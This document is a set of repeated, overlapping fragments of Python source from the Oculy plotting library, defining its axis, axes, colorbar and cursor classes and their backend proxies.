"unknown]}).\" ) else: raise RuntimeError( f\"The axes used for {[lab for lab, _", "plot.axes_mapping = axes # Validate the axes supposed to be used. if any(", "f\"{pa}_axis\") is None: missing.append((lab, pa)) if missing: raise RuntimeError( f\"The axes used for", "in unknown]}).\" ) else: raise RuntimeError( f\"The axes used for {[lab for lab,", "Validate the axes supposed to be used. if any( ( pa not in", "self.colorbar def add_line( self, id: str, orientation: str, position: float, bounds: Optional[Tuple[float, float]]", "Tuple as ATuple from atom.api import Typed from ..backends.resolver import BackendResolver from .base", "self recursion # FIXME Add convenience to connect axes between them class Colorbar(PlotElement):", "a single axis. 
Handle: - scaling - bounds \"\"\" @mark_backend_unsupported def set_axis_scale(self, scale):", "axis label = Str() #: Tick labels. tick_labels = List(str) #: Font used", "font: Mapping[str, Any]): pass @mark_backend_unsupported def set_tick_labels(self, labels: Sequence[str], font: Mapping[str, Any]): pass", "details. # # Distributed under the terms of the BSD license. # #", "@mark_backend_unsupported def disable_zooming(self): pass @mark_backend_unsupported def enable_panning(self, button: str): pass @mark_backend_unsupported def disable_panning(self):", "to the parent axes. axes = ForwardTyped(lambda: Axes) #: Should that axis be", "connect axes between them class Colorbar(PlotElement): \"\"\"Colorbar for a 2D plot.\"\"\" #: Reference", "the parent axes. axes = ForwardTyped(lambda: Axes) #: Should that axis be autoscaled", "Reference to the parent axes. axes = ForwardTyped(lambda: Axes) #: Position at which", "not axis: continue axis.backend_name = self.backend_name axis.initialize(resolver) if self.colorbar: self.colorbar.backend_name = self.backend_name self.colorbar.initialize(resolver)", "self.colorbar.backend_name = self.backend_name self.colorbar.initialize(resolver) for c in self.cursors: c.backend_name = self.backend_name c.initialize(resolver) for", "proxy of the figure.\"\"\" for p in self.plots.values(): p.finalize() for c in self.cursors:", "} plot.axes_mapping = axes # Validate the axes supposed to be used. if", "Colorbar(axes=self) if self._resolver: self.colorbar.initialize(self._resolver) def remove_colorbar(self): \"\"\"Remove the colorbar from the axes.\"\"\" self.colorbar.finalize()", "RuntimeError(f\"A plot with {id} already exist in axes {self}\") axes = plot.axes_mapping if", "more details. # # Distributed under the terms of the BSD license. 
#", "Typed(Axis) bottom_axis = Typed(Axis) right_axis = Typed(Axis) top_axis = Typed(Axis) #: Colorbar associated", "provided axes are \" f\"{[pa for _, pa in unknown]}).\" ) else: raise", "# matplotlib default) # --- Private API #: Reference to the backend resolver", "axes = { \"x\": \"bottom\" if self.bottom_axis else \"top\", \"y\": \"left\" if self.left_axis", "Sequence, Tuple from atom.api import Bool, Dict, Enum, Float, ForwardTyped, Int, List, Str", "def __init__(self, **kwargs): super().__init__(**kwargs) if not self.bottom_axis or self.top_axis: self.bottom_axis = Axis(axes=self) if", "not in self.plots: raise KeyError( f\"Plot {id} does not exist in axes {self.axes},\"", "of the figure.\"\"\" for p in self.plots.values(): p.finalize() for c in self.cursors: c.finalize()", "RuntimeError(f\"Axes {self} does not have an active proxy.\") self.proxy.remove_plot(id, self.plots[id]) def add_colorbar(self): \"\"\"Add", "if any. colorbar = Typed(Colorbar) #: Set of cursors currently active on the", "Axes) #: Position at which the colorbar should be created. location = Enum(\"right\",", "= Dict(str, str) #: Projection to use on the axes. projection = Enum(\"cartesian\",", "axis.finalize() super().finalize() def add_cursor(self, axes: Tuple[str, str]): # What axis are we linked", "def enable_zooming(self, bound: str, button: str): pass @mark_backend_unsupported def disable_zooming(self): pass @mark_backend_unsupported def", "position: float, bounds: Optional[Tuple[float, float]] = None, ): pass def remove_line(self, id: str)", "for axis in (self.left_axis, self.bottom_axis, self.right_axis, self.top_axis): if not axis: continue axis.backend_name =", "ATuple from atom.api import Typed from ..backends.resolver import BackendResolver from .base import BasePlot,", "is None ) for pa in axes.values() ): unknown = [] missing =", "into the axis and way to manipulate the axis appearance. 
\"\"\" @mark_backend_unsupported def", "= self.backend_name c.initialize(resolver) for p in self.plots.values(): p.backend_name = self.backend_name p.initialize(resolver) #: Conserve", "= Dict(str) #: Intercept position of this axis with the other axis in", "plotted. plot.axes = self self.plots[plot.id] = plot # Initialize the plot if we", "the resolver to be able to add more elements #: later on. self._resolver", "\" f\"{[ax for ax in axes.axes._fields if axes.axes[ax] is not None]}, \" f\"specified", ".base import BasePlot, PlotElement, PlotElementProxy, mark_backend_unsupported class AxisProxy(PlotElementProxy): \"\"\"Proxy for a single axis.", "def remove_plot(self, id): pass @mark_backend_unsupported def add_line( self, id: str, orientation: str, position:", "Colorbar associated with plot if any. colorbar = Typed(Colorbar) #: Set of cursors", "Dict(str, BasePlot) #: Display a major grid major_grid_enabled = Bool() #: Display a", "not \" \"correspond to any valid axes (valid axes are \" \"'left', 'right',", "mark_backend_unsupported class AxisProxy(PlotElementProxy): \"\"\"Proxy for a single axis. 
Handle: - scaling - bounds", "if id not in self.plots: raise KeyError( f\"Plot {id} does not exist in", "the colorbar attached to a colorplot.\"\"\" @mark_backend_unsupported def set_axis_scale(self, scale): # lin, log", "axes used for {[lab for lab, _ in missing]} do not \" \"exist.", "= [] for lab, pa in axes.items(): if pa not in (\"left\", \"bottom\",", "cursor is bound pass @mark_backend_unsupported def remove_cursor(self): pass @mark_backend_unsupported def enable_major_grid(self): pass @mark_backend_unsupported", "str]): pass @mark_backend_unsupported def remove_plot(self, id): pass @mark_backend_unsupported def add_line( self, id: str,", "axis be autoscaled auto_scaling = Bool() #: List of 2 tuple representing a", "= Bool() #: Label of the axis label = Str() #: Tick labels.", "not self.left_axis or self.right_axis: self.left_axis = Axis(axes=self) def initialize(self, resolver): \"\"\"Initialize the proxy", "bound pass @mark_backend_unsupported def remove_cursor(self): pass @mark_backend_unsupported def enable_major_grid(self): pass @mark_backend_unsupported def disable_major_grid(self):", "the axes. projection = Enum(\"cartesian\", \"polar\") def __init__(self, **kwargs): super().__init__(**kwargs) if not self.bottom_axis", "Reference to the backend resolver needed to dynamically add axes _resolver = Typed(BackendResolver)", "labels tick_labels_font = Dict(str) #: Intercept position of this axis with the other", "axes=None): pass @mark_backend_unsupported def remove_axis(self): pass @mark_backend_unsupported def set_projections(self): pass @mark_backend_unsupported def add_cursor(", "self.plots: raise RuntimeError(f\"A plot with {id} already exist in axes {self}\") axes =", "\"bottom\", \"right\", \"top\"): unknown.append((lab, pa)) elif getattr(axes, f\"{pa}_axis\") is None: missing.append((lab, pa)) if", "List of 2 tuple representing a possibly discountinuous axis. 
limits = List(tuple) #:", "def initialize(self, resolver): \"\"\"Initialize the proxy of the object and the axes.\"\"\" super().initialize(resolver)", "- scaling - bounds \"\"\" @mark_backend_unsupported def set_axis_scale(self, scale): # lin, log raise", "label = Str() #: Tick labels. tick_labels = List(str) #: Font used for", "to prevent self recursion # FIXME Add convenience to connect axes between them", "do not \" \"exist. Existing axes are \" f\"{[ax for ax in axes.axes._fields", "this axis with the other axis in data coordinate. #: Setting this values", "super().finalize() def add_cursor(self, axes: Tuple[str, str]): # What axis are we linked to", "Sequence[str], font: Mapping[str, Any]): pass @mark_backend_unsupported def set_tick_position(self, position: str): pass class ColorbarProxy(PlotElementProxy):", "Add convenience to connect axes between them class Colorbar(PlotElement): \"\"\"Colorbar for a 2D", "Oculy Authors, see git history for more details. # # Distributed under the", "axis in (self.left_axis, self.bottom_axis, self.right_axis, self.top_axis): if not axis: continue axis.backend_name = self.backend_name", "= plot # Initialize the plot if we have a resolver if self._resolver:", "{self} does not have an active proxy.\") self.proxy.remove_plot(id, self.plots[id]) def add_colorbar(self): \"\"\"Add a", "#: Display a major grid major_grid_enabled = Bool() #: Display a minor grid", "**kwargs): super().__init__(**kwargs) if not self.bottom_axis or self.top_axis: self.bottom_axis = Axis(axes=self) if not self.left_axis", "known plots are {self.plots}\" ) if not self.proxy: raise RuntimeError(f\"Axes {self} does not", "axis with no breaks pass @mark_backend_unsupported def set_limits_with_breaks(self, limits): pass @mark_backend_unsupported def set_label(self,", "\"bottom\") #: Should that axis be autoscaled auto_scaling = Bool() #: List of", "(valid axes are \" \"'left', 'right', 'top', 'bottom', provided axes are \" f\"{[pa", "= self.backend_name 
axis.initialize(resolver) if self.colorbar: self.colorbar.backend_name = self.backend_name self.colorbar.initialize(resolver) for c in self.cursors:", "return self.colorbar = Colorbar(axes=self) if self._resolver: self.colorbar.initialize(self._resolver) def remove_colorbar(self): \"\"\"Remove the colorbar from", "c_value = Float(float(\"nan\")) # FIXME need to sync to the proxy def _resolve_figure():", "Intercept position of this axis with the other axis in data coordinate. #:", "= Bool() #: List of 2 tuple representing a possibly discountinuous axis. limits", "is None: missing.append((lab, pa)) if missing: raise RuntimeError( f\"The axes used for {[lab", "appearance. \"\"\" @mark_backend_unsupported def enable_zooming(self, bound: str, button: str): pass @mark_backend_unsupported def disable_zooming(self):", "= Enum(\"cartesian\", \"polar\") def __init__(self, **kwargs): super().__init__(**kwargs) if not self.bottom_axis or self.top_axis: self.bottom_axis", "will have an impact only if there are only 2 active #: axes", "index: int): pass def add_plot(self, plot) -> None: \"\"\"Add a plot to the", "= List(tuple) #: Is the axis direction inverted. inverted = Bool() #: Label", "with no breaks pass @mark_backend_unsupported def set_limits_with_breaks(self, limits): pass @mark_backend_unsupported def set_label(self, title:", "already exist in axes {self}\") axes = plot.axes_mapping if not axes: axes =", "FIXME Add connections to the proxy and a way to prevent self recursion", "super().initialize(resolver) for axis in (self.left_axis, self.bottom_axis, self.right_axis, self.top_axis): if not axis: continue axis.backend_name", "KeyError( f\"Plot {id} does not exist in axes {self.axes},\" f\" known plots are", "legends = Dict(str, str) #: Projection to use on the axes. projection =", "= Str() #: Tick labels. tick_labels = List(str) #: Font used for the", "position of this axis with the other axis in data coordinate. 
#: Setting", "2D plot.\"\"\" #: Reference to the parent axes. axes = ForwardTyped(lambda: Axes) #:", "holding the axes. figure = ForwardTyped(_resolve_figure) #: Axes composing this object. left_axis =", "for a 2D plot.\"\"\" #: Reference to the parent axes. axes = ForwardTyped(lambda:", "raise RuntimeError( f\"The axes used for {[lab for lab, _ in missing]} do", "f\" known plots are {self.plots}\" ) if not self.proxy: raise RuntimeError(f\"Axes {self} does", "bounds: Optional[Tuple[float, float]] = None, ): pass def remove_line(self, id: str) -> None:", "to the proxy and a way to prevent self recursion # FIXME Add", "self.backend_name c.initialize(resolver) for p in self.plots.values(): p.backend_name = self.backend_name p.initialize(resolver) #: Conserve a", "for {[lab for lab, _ in missing]} do not \" \"exist. Existing axes", "class CursorProxy(PlotElementProxy): \"\"\"Proxy for a cursor.\"\"\" pass class AxesProxy(PlotElementProxy): \"\"\"Proxy for axes. As", "(accross different figures ie beyond # matplotlib default) # --- Private API #:", "and way to manipulate the axis appearance. \"\"\" @mark_backend_unsupported def enable_zooming(self, bound: str,", "Bool() #: List of 2 tuple representing a possibly discountinuous axis. limits =", "plot with {id} already exist in axes {self}\") axes = plot.axes_mapping if not", "is plotted. 
plot.axes = self self.plots[plot.id] = plot # Initialize the plot if", "@mark_backend_unsupported def set_label(self, title: str, font: Mapping[str, Any]): pass @mark_backend_unsupported def set_tick_labels(self, labels:", "if not axis: continue axis.backend_name = self.backend_name axis.initialize(resolver) if self.colorbar: self.colorbar.backend_name = self.backend_name", "self.backend_name self.colorbar.initialize(resolver) for c in self.cursors: c.backend_name = self.backend_name c.initialize(resolver) for p in", "unknown.append((lab, pa)) elif getattr(axes, f\"{pa}_axis\") is None: missing.append((lab, pa)) if missing: raise RuntimeError(", "Mapping[str, Any]): pass @mark_backend_unsupported def set_tick_labels(self, labels: Sequence[str], font: Mapping[str, Any]): pass @mark_backend_unsupported", "None: \"\"\"Add a plot to the axes.\"\"\" if plot.id in self.plots: raise RuntimeError(f\"A", "getattr(axes, f\"{pa}_axis\") is None: missing.append((lab, pa)) if missing: raise RuntimeError( f\"The axes used", "\"top\", \"y\": \"left\" if self.left_axis else \"right\", } plot.axes_mapping = axes # Validate", "colorbar = Typed(Colorbar) #: Set of cursors currently active on the graph cursors", "del self.colorbar def add_line( self, id: str, orientation: str, position: float, bounds: Optional[Tuple[float,", "projection = Enum(\"cartesian\", \"polar\") def __init__(self, **kwargs): super().__init__(**kwargs) if not self.bottom_axis or self.top_axis:", "elements #: later on. self._resolver = resolver def finalize(self): \"\"\"Finalize the proxy of", "way to manipulate the axis appearance. \"\"\" @mark_backend_unsupported def enable_zooming(self, bound: str, button:", "def set_limits_with_breaks(self, limits): pass @mark_backend_unsupported def invert_axis(self, state: bool): pass @mark_backend_unsupported def set_label(self,", "should be created. 
location = Enum(\"right\", \"top\", \"left\", \"bottom\") #: Should that axis", "Copyright 2020-2021 by Oculy Authors, see git history for more details. # #", "pass @mark_backend_unsupported def disable_minor_grid(self): pass @mark_backend_unsupported def set_legend(self, legend: Mapping[str, str]): pass @mark_backend_unsupported", "Projection to use on the axes. projection = Enum(\"cartesian\", \"polar\") def __init__(self, **kwargs):", "later on. self._resolver = resolver def finalize(self): \"\"\"Finalize the proxy of the figure.\"\"\"", "str) -> None: pass class Axis(PlotElement): \"\"\"Axis of a plot.\"\"\" #: Reference to", "Is the axis direction inverted. inverted = Bool() #: Label of the axis", "see git history for more details. # # Distributed under the terms of", "( pa not in (\"left\", \"bottom\", \"right\", \"top\") or getattr(self, f\"{pa}_axis\") is None", "LICENCE, distributed with this software. # -------------------------------------------------------------------------------------- \"\"\"Axis, axes, colorbar and their associated", "knows where it is plotted. 
plot.axes = self self.plots[plot.id] = plot # Initialize", "the proxy of the object and the axes.\"\"\" super().initialize(resolver) for axis in (self.left_axis,", "to the resolver to be able to add more elements #: later on.", "the proxy of the figure.\"\"\" for p in self.plots.values(): p.finalize() for c in", "'top', 'bottom', provided axes are \" f\"{[pa for _, pa in unknown]}).\" )", "# FIXME need to sync to the proxy def _resolve_figure(): from .figure import", "inverted = Bool() #: Label of the axis label = Str() #: Tick", "if self.colorbar: self.colorbar.finalize() for axis in (self.top_axis, self.right_axis, self.bottom_axis, self.left_axis): axis.finalize() super().finalize() def", "= None, ): pass @mark_backend_unsupported def remove_line(self, id: str) -> None: pass class", "for ax in axes.axes._fields if axes.axes[ax] is not None]}, \" f\"specified axes are", "elif getattr(axes, f\"{pa}_axis\") is None: missing.append((lab, pa)) if missing: raise RuntimeError( f\"The axes", "): unknown = [] missing = [] for lab, pa in axes.items(): if", "RuntimeError( f\"The axes used for {[lab for lab, _ in missing]} do not", "ie beyond # matplotlib default) # --- Private API #: Reference to the", "if not self.proxy: raise RuntimeError(f\"Axes {self} does not have an active proxy.\") self.proxy.remove_plot(id,", "pass @mark_backend_unsupported def set_label(self, title: str, font: Mapping[str, Any]): pass @mark_backend_unsupported def set_tick_labels(self,", "figure = ForwardTyped(_resolve_figure) #: Axes composing this object. 
left_axis = Typed(Axis) bottom_axis =", "for the tick labels tick_labels_font = Dict(str) #: aspect_ratio = Int(20) class Cursor(PlotElement):", "do not \" \"correspond to any valid axes (valid axes are \" \"'left',", "str): pass class ColorbarProxy(PlotElementProxy): \"\"\"Proxy for the colorbar attached to a colorplot.\"\"\" @mark_backend_unsupported", "button: str): pass @mark_backend_unsupported def disable_zooming(self): pass @mark_backend_unsupported def enable_panning(self, button: str): pass", "class Axes(PlotElement): \"\"\"Axes of a plot\"\"\" #: Reference to the figure holding the", "#: Conserve a reference to the resolver to be able to add more", "a resolver if self._resolver: plot.initialize(self._resolver) def remove_plot(self, id): \"\"\"Remove a plot based on", "@mark_backend_unsupported def enable_minor_grid(self): pass @mark_backend_unsupported def disable_minor_grid(self): pass @mark_backend_unsupported def set_legend(self, legend: Mapping[str,", "Tuple from atom.api import Bool, Dict, Enum, Float, ForwardTyped, Int, List, Str from", "at which the colorbar should be created. location = Enum(\"right\", \"top\", \"left\", \"bottom\")", "Bool, Dict, Enum, Float, ForwardTyped, Int, List, Str from atom.api import Tuple as", "# FIXME Add connections to the proxy and a way to prevent self", "Conserve a reference to the resolver to be able to add more elements", "Mapping[str, Any]): pass class CursorProxy(PlotElementProxy): \"\"\"Proxy for a cursor.\"\"\" pass class AxesProxy(PlotElementProxy): \"\"\"Proxy", "Cursor(PlotElement): \"\"\"Cursor on a plot.\"\"\" #: x_value = Float() #: y_value = Float()", "plots are {self.plots}\" ) if not self.proxy: raise RuntimeError(f\"Axes {self} does not have", "cursors currently active on the graph cursors = ATuple(Cursor) #: Set of plots", "axis. limits = List(tuple) #: Is the axis direction inverted. 
inverted = Bool()", "\" f\"specified axes are {[pa for _, pa in missing]}.\" ) # Make", "from atom.api import Typed from ..backends.resolver import BackendResolver from .base import BasePlot, PlotElement,", "axis. Handle: - scaling - bounds \"\"\" @mark_backend_unsupported def set_axis_scale(self, scale): # lin,", "exist in axes {self.axes},\" f\" known plots are {self.plots}\" ) if not self.proxy:", "_, pa in unknown]}).\" ) else: raise RuntimeError( f\"The axes used for {[lab", "axes plots = Dict(str, BasePlot) #: Display a major grid major_grid_enabled = Bool()", "PlotElementProxy, mark_backend_unsupported class AxisProxy(PlotElementProxy): \"\"\"Proxy for a single axis. Handle: - scaling -", "NOT be edited in place. legends = Dict(str, str) #: Projection to use", "from .figure import Figure return Figure class Axes(PlotElement): \"\"\"Axes of a plot\"\"\" #:", "to draw into the axis and way to manipulate the axis appearance. \"\"\"", "pass @mark_backend_unsupported def disable_major_grid(self): pass @mark_backend_unsupported def enable_minor_grid(self): pass @mark_backend_unsupported def disable_minor_grid(self): pass", "\" \"exist. 
Existing axes are \" f\"{[ax for ax in axes.axes._fields if axes.axes[ax]", "pass @mark_backend_unsupported def add_cursor( self, axes=None ): # Need to specify to which", "@mark_backend_unsupported def set_autoscaling(self, setting: bool): pass @mark_backend_unsupported def set_limits(self, limits): # Limited to", "Dict(str) #: aspect_ratio = Int(20) class Cursor(PlotElement): \"\"\"Cursor on a plot.\"\"\" #: x_value", "continue axis.backend_name = self.backend_name axis.initialize(resolver) if self.colorbar: self.colorbar.backend_name = self.backend_name self.colorbar.initialize(resolver) for c", "Private API #: Reference to the backend resolver needed to dynamically add axes", "have an impact only if there are only 2 active #: axes in", "None, ): pass @mark_backend_unsupported def remove_line(self, id: str) -> None: pass class Axis(PlotElement):", "used for the tick labels tick_labels_font = Dict(str) #: aspect_ratio = Int(20) class", "be autoscaled auto_scaling = Bool() #: List of 2 tuple representing a possibly", "if not self.bottom_axis or self.top_axis: self.bottom_axis = Axis(axes=self) if not self.left_axis or self.right_axis:", "axes {self.axes},\" f\" known plots are {self.plots}\" ) if not self.proxy: raise RuntimeError(f\"Axes", "colorbar should be created. location = Enum(\"right\", \"top\", \"left\", \"bottom\") #: Should that", "on its ID.\"\"\" if id not in self.plots: raise KeyError( f\"Plot {id} does", "= None, ): pass def remove_line(self, id: str) -> None: pass # FIXME", "a possibly discountinuous axis. limits = List(tuple) #: Is the axis direction inverted.", "plot if we have a resolver if self._resolver: plot.initialize(self._resolver) def remove_plot(self, id): \"\"\"Remove", "object. 
left_axis = Typed(Axis) bottom_axis = Typed(Axis) right_axis = Typed(Axis) top_axis = Typed(Axis)", "orientation: str, position: float, bounds: Optional[Tuple[float, float]] = None, ): pass def remove_line(self,", "modifiers # TODO Add the ability to link axes (accross different figures ie", "if not axes: axes = { \"x\": \"bottom\" if self.bottom_axis else \"top\", \"y\":", "= Dict(str, BasePlot) #: Display a major grid major_grid_enabled = Bool() #: Display", "invert_axis(self, state: bool): pass @mark_backend_unsupported def set_label(self, title: str, font: Mapping[str, Any]): pass", "Authors, see git history for more details. # # Distributed under the terms", "= Typed(Axis) bottom_axis = Typed(Axis) right_axis = Typed(Axis) top_axis = Typed(Axis) #: Colorbar", "grid major_grid_enabled = Bool() #: Display a minor grid minor_grid_enabled = Bool() #:", "def enable_minor_grid(self): pass @mark_backend_unsupported def disable_minor_grid(self): pass @mark_backend_unsupported def set_legend(self, legend: Mapping[str, str]):", "pass class CursorProxy(PlotElementProxy): \"\"\"Proxy for a cursor.\"\"\" pass class AxesProxy(PlotElementProxy): \"\"\"Proxy for axes.", "@mark_backend_unsupported def set_limits_with_breaks(self, limits): pass @mark_backend_unsupported def invert_axis(self, state: bool): pass @mark_backend_unsupported def", "#: Tick labels. tick_labels = List(str) #: Font used for the label label_font", "\"\"\" @mark_backend_unsupported def enable_zooming(self, bound: str, button: str): pass @mark_backend_unsupported def disable_zooming(self): pass", "only if there are only 2 active #: axes in the axes_set. 
intercept", "# # The full license is in the file LICENCE, distributed with this", "in self.plots.values(): p.backend_name = self.backend_name p.initialize(resolver) #: Conserve a reference to the resolver", "are \" f\"{[pa for _, pa in unknown]}).\" ) else: raise RuntimeError( f\"The", "FIXME Need to define the proper API to enable zooming/panning and modifiers #", "@mark_backend_unsupported def set_axis_scale(self, scale): # lin, log raise NotImplementedError() @mark_backend_unsupported def set_autoscaling(self, setting:", "Enum(\"right\", \"top\", \"left\", \"bottom\") #: Should that axis be autoscaled auto_scaling = Bool()", "by Oculy Authors, see git history for more details. # # Distributed under", "the axes supposed to be used. if any( ( pa not in (\"left\",", "f\"The axes used for {[lab for lab, _ in missing]} do not \"", "grid minor_grid_enabled = Bool() #: # SHOULD NOT be edited in place. legends", "#: Font used for the label label_font = Dict(str) #: Font used for", "\"exist. Existing axes are \" f\"{[ax for ax in axes.axes._fields if axes.axes[ax] is", "self.bottom_axis, self.right_axis, self.top_axis): if not axis: continue axis.backend_name = self.backend_name axis.initialize(resolver) if self.colorbar:", "bounds \"\"\" @mark_backend_unsupported def set_axis_scale(self, scale): # lin, log raise NotImplementedError() @mark_backend_unsupported def", "Font used for the label label_font = Dict(str) #: Font used for the", "left_axis = Typed(Axis) bottom_axis = Typed(Axis) right_axis = Typed(Axis) top_axis = Typed(Axis) #:", "for a single axis. 
Handle: - scaling - bounds \"\"\" @mark_backend_unsupported def set_axis_scale(self,", "Mapping, Optional, Sequence, Tuple from atom.api import Bool, Dict, Enum, Float, ForwardTyped, Int,", "self.bottom_axis else \"top\", \"y\": \"left\" if self.left_axis else \"right\", } plot.axes_mapping = axes", "enable_major_grid(self): pass @mark_backend_unsupported def disable_major_grid(self): pass @mark_backend_unsupported def enable_minor_grid(self): pass @mark_backend_unsupported def disable_minor_grid(self):", "= List(str) #: Font used for the label label_font = Dict(str) #: Font", "legend: Mapping[str, str]): pass @mark_backend_unsupported def remove_plot(self, id): pass @mark_backend_unsupported def add_line( self,", "coordinate. #: Setting this values will have an impact only if there are", "the proxy def _resolve_figure(): from .figure import Figure return Figure class Axes(PlotElement): \"\"\"Axes", "#: later on. self._resolver = resolver def finalize(self): \"\"\"Finalize the proxy of the", "manipulate the axis appearance. \"\"\" @mark_backend_unsupported def enable_zooming(self, bound: str, button: str): pass", "pass @mark_backend_unsupported def add_line( self, id: str, orientation: str, position: float, bounds: Optional[Tuple[float,", "values will have an impact only if there are only 2 active #:", "in self.plots: raise KeyError( f\"Plot {id} does not exist in axes {self.axes},\" f\"", "axes.axes._fields if axes.axes[ax] is not None]}, \" f\"specified axes are {[pa for _,", "in axes.axes._fields if axes.axes[ax] is not None]}, \" f\"specified axes are {[pa for", "#: c_value = Float(float(\"nan\")) # FIXME need to sync to the proxy def", "As in matplotlib an axis is expected to provide way to draw into", "= axes # Validate the axes supposed to be used. 
if any( (", "does not exist in axes {self.axes},\" f\" known plots are {self.plots}\" ) if", "if pa not in (\"left\", \"bottom\", \"right\", \"top\"): unknown.append((lab, pa)) elif getattr(axes, f\"{pa}_axis\")", "BackendResolver from .base import BasePlot, PlotElement, PlotElementProxy, mark_backend_unsupported class AxisProxy(PlotElementProxy): \"\"\"Proxy for a", "attached to a colorplot.\"\"\" @mark_backend_unsupported def set_axis_scale(self, scale): # lin, log raise NotImplementedError()", "@mark_backend_unsupported def set_tick_position(self, position: str): pass class ColorbarProxy(PlotElementProxy): \"\"\"Proxy for the colorbar attached", "Int(20) class Cursor(PlotElement): \"\"\"Cursor on a plot.\"\"\" #: x_value = Float() #: y_value", "\"\"\"Remove a plot based on its ID.\"\"\" if id not in self.plots: raise", "Enum, Float, ForwardTyped, Int, List, Str from atom.api import Tuple as ATuple from", "breaks pass @mark_backend_unsupported def set_limits_with_breaks(self, limits): pass @mark_backend_unsupported def set_label(self, title: str, font:", "(\"left\", \"bottom\", \"right\", \"top\"): unknown.append((lab, pa)) elif getattr(axes, f\"{pa}_axis\") is None: missing.append((lab, pa))", "self._resolver: plot.initialize(self._resolver) def remove_plot(self, id): \"\"\"Remove a plot based on its ID.\"\"\" if", "= ForwardTyped(lambda: Axes) #: Should that axis be autoscaled auto_scaling = Bool() #:", "= Float() # FIXME Add connections to the proxy and a way to", "axes.values() ): unknown = [] missing = [] for lab, pa in axes.items():", "self.colorbar = Colorbar(axes=self) if self._resolver: self.colorbar.initialize(self._resolver) def remove_colorbar(self): \"\"\"Remove the colorbar from the", "str): pass @mark_backend_unsupported def disable_zooming(self): pass @mark_backend_unsupported def enable_panning(self, button: str): pass @mark_backend_unsupported", "add_cursor( self, axes=None ): # Need to specify to which axes the cursor", "be created. 
location = Enum(\"right\", \"top\", \"left\", \"bottom\") #: Should that axis be", "of 2 tuple representing a possibly discountinuous axis. limits = List(tuple) #: Is", "define the proper API to enable zooming/panning and modifiers # TODO Add the", "not \" \"exist. Existing axes are \" f\"{[ax for ax in axes.axes._fields if", "if self.bottom_axis else \"top\", \"y\": \"left\" if self.left_axis else \"right\", } plot.axes_mapping =", "{self}\") axes = plot.axes_mapping if not axes: axes = { \"x\": \"bottom\" if", "limits): pass @mark_backend_unsupported def invert_axis(self, state: bool): pass @mark_backend_unsupported def set_label(self, title: str,", "there are only 2 active #: axes in the axes_set. intercept = Float()", "on. self._resolver = resolver def finalize(self): \"\"\"Finalize the proxy of the figure.\"\"\" for", "breaks pass @mark_backend_unsupported def set_limits_with_breaks(self, limits): pass @mark_backend_unsupported def invert_axis(self, state: bool): pass", "remove_plot(self, id): pass @mark_backend_unsupported def add_line( self, id: str, orientation: str, position: float,", "c in self.cursors: c.backend_name = self.backend_name c.initialize(resolver) for p in self.plots.values(): p.backend_name =", "BSD license. # # The full license is in the file LICENCE, distributed", "terms of the BSD license. # # The full license is in the", "parent axes. 
axes = ForwardTyped(lambda: Axes) #: Position at which the colorbar should", "does not have an active proxy.\") self.proxy.remove_plot(id, self.plots[id]) def add_colorbar(self): \"\"\"Add a colorbar", "proper API to enable zooming/panning and modifiers # TODO Add the ability to", "plot.axes = self self.plots[plot.id] = plot # Initialize the plot if we have", "bool): pass @mark_backend_unsupported def set_limits(self, limits): # Limited to axis with no breaks", "-------------------------------------------------------------------------------------- # Copyright 2020-2021 by Oculy Authors, see git history for more details.", "the proper API to enable zooming/panning and modifiers # TODO Add the ability", "\"\"\"Finalize the proxy of the figure.\"\"\" for p in self.plots.values(): p.finalize() for c", "figure.\"\"\" for p in self.plots.values(): p.finalize() for c in self.cursors: c.finalize() if self.colorbar:", "be edited in place. legends = Dict(str, str) #: Projection to use on", "if axes.axes[ax] is not None]}, \" f\"specified axes are {[pa for _, pa", "self self.plots[plot.id] = plot # Initialize the plot if we have a resolver", "Bool() #: Display a minor grid minor_grid_enabled = Bool() #: # SHOULD NOT", "plot\"\"\" #: Reference to the figure holding the axes. figure = ForwardTyped(_resolve_figure) #:", "PlotElement, PlotElementProxy, mark_backend_unsupported class AxisProxy(PlotElementProxy): \"\"\"Proxy for a single axis. Handle: - scaling", "in (\"left\", \"bottom\", \"right\", \"top\"): unknown.append((lab, pa)) elif getattr(axes, f\"{pa}_axis\") is None: missing.append((lab,", "for lab, _ in unknown]} do not \" \"correspond to any valid axes", "the axes. figure = ForwardTyped(_resolve_figure) #: Axes composing this object. left_axis = Typed(Axis)", "single axis. 
Handle: - scaling - bounds \"\"\" @mark_backend_unsupported def set_axis_scale(self, scale): #", "@mark_backend_unsupported def add_axis(self, axes=None): pass @mark_backend_unsupported def remove_axis(self): pass @mark_backend_unsupported def set_projections(self): pass", "in the axes_set. intercept = Float() # FIXME Add connections to the proxy", "self.bottom_axis = Axis(axes=self) if not self.left_axis or self.right_axis: self.left_axis = Axis(axes=self) def initialize(self,", "pa not in (\"left\", \"bottom\", \"right\", \"top\"): unknown.append((lab, pa)) elif getattr(axes, f\"{pa}_axis\") is", "unknown]} do not \" \"correspond to any valid axes (valid axes are \"", "def add_cursor( self, axes=None ): # Need to specify to which axes the", "Reference to the figure holding the axes. figure = ForwardTyped(_resolve_figure) #: Axes composing", "Set of cursors currently active on the graph cursors = ATuple(Cursor) #: Set", "\"bottom\", \"right\", \"top\") or getattr(self, f\"{pa}_axis\") is None ) for pa in axes.values()", "# Need to specify to which axes the cursor is bound pass @mark_backend_unsupported", "the figure.\"\"\" for p in self.plots.values(): p.finalize() for c in self.cursors: c.finalize() if", "y_value = Float() #: c_value = Float(float(\"nan\")) # FIXME need to sync to", "Float() #: c_value = Float(float(\"nan\")) # FIXME need to sync to the proxy", "enable_minor_grid(self): pass @mark_backend_unsupported def disable_minor_grid(self): pass @mark_backend_unsupported def set_legend(self, legend: Mapping[str, str]): pass", "): # Need to specify to which axes the cursor is bound pass", "= ForwardTyped(_resolve_figure) #: Axes composing this object. 
